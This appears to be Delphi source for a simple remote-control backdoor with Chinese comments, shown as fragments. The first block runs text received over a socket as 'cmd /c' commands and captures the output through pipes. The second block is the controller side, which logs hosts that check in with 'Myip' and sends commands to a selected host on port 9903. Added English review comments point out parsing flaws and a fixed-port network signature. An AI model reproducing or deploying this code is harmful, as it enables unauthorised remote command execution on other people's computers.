//进程通信还是使用最早的匿名管道方式
//接收到指令后,加'cmd /c'拼接成完整命令
Remotecmd:='cmd /c'+socket.ReceiveText;
lsa.nLength := SizeOf(SECURITY_ATTRIBUTES);
lsa.lpSecurityDescriptor := nil;
lsa.bInheritHandle := True;
//创建两个匿名管道用来读写信息
if CreatePipe(Readniming,Writeniming,@lsa,0) = false then
begin
cs1.Socket.SendText('不能创建匿名管道');
Freemem(ph);
Freemem(fname);
Exit;
end;
//创建进程,执行cmd命令
StrPcopy(fname,Remotecmd);
if CreateProcess(nil,fname,nil,nil,True,0,nil,nil,si,pi) = False then
begin
cs1.socket.SendText('不能创建进程');
Freemem(ph);
Freemem(fname);
Exit;
end;
While(true) do
begin
if not PeekNamedPipe(Readniming,ph,1,@cchReadBuffer,nil,nil) Then break;
If cchReadbuffer <> 0 then
begin
if Readfile(Readniming,ph^,4096,cchReadBuffer,nil) = False Then break;
ph[cchReadbuffer]:=Chr(0);
Memo1.Lines.Add(ph); //命令执行结果保存在Memo1里
end
else
if (WaitForSingleObject(pi.hProcess,0) = WAIT_OBJECT_0) Then break;
Sleep(500);
end;
ph[cchReadBuffer]:=Chr(0);
Memo1.Lines.Add(ph);
procedure TForm1.ss1ClientRead(Sender: TObject; Socket: TCustomWinSocket);
// OnClientRead handler for the listening socket ss1.
// Reads whatever text is currently available on the client socket. If the
// text contains the marker 'Myip' it is treated as a host check-in: a
// message box is shown and the text after the first 'p' (Length - 4
// characters of it) is appended to listbox1. Any other text is appended
// verbatim to memo1.
// NOTE(review): the parsing presumes the text is exactly 'Myip' followed by
// the address; one ReceiveText call is also presumed to carry exactly one
// message, which TCP does not guarantee — confirm against the sending side.
var
  payload: string;
  markerPos: Integer;
begin
  payload := Socket.ReceiveText;
  markerPos := Pos('Myip', payload);
  if markerPos = 0 then
  begin
    memo1.Lines.Add(payload);
    Exit;
  end;
  ShowMessage('有主机上线!');
  // Same slice as before: start right after the first 'p' in the text,
  // take Length(payload) - 4 characters.
  payload := Copy(payload, Pos('p', payload) + 1, Length(payload) - 4);
  listbox1.Items.Add(payload);
end;
procedure TForm1.Button1Click(Sender: TObject);
// OnClick handler for Button1.
// Finds the first selected entry in listbox1, uses it (trimmed) as the
// address of cs1, sets the port to 9903 and activates cs1. The contents of
// edit1 are then sent through cs1.Socket regardless of whether an entry was
// selected or whether the connection has completed.
// Defender note: the destination port is a fixed constant (9903), so the
// resulting connections carry a stable, host-independent network signature.
var
  idx: Integer;
begin
  for idx := 0 to listbox1.Items.Count - 1 do
  begin
    if not listbox1.Selected[idx] then
      Continue;
    // First selected row wins; later selections are ignored.
    cs1.Address := Trim(listbox1.Items[idx]);
    cs1.Port := 9903;
    cs1.Active := True;
    Break;
  end;
  cs1.Socket.SendText(edit1.Text);
end;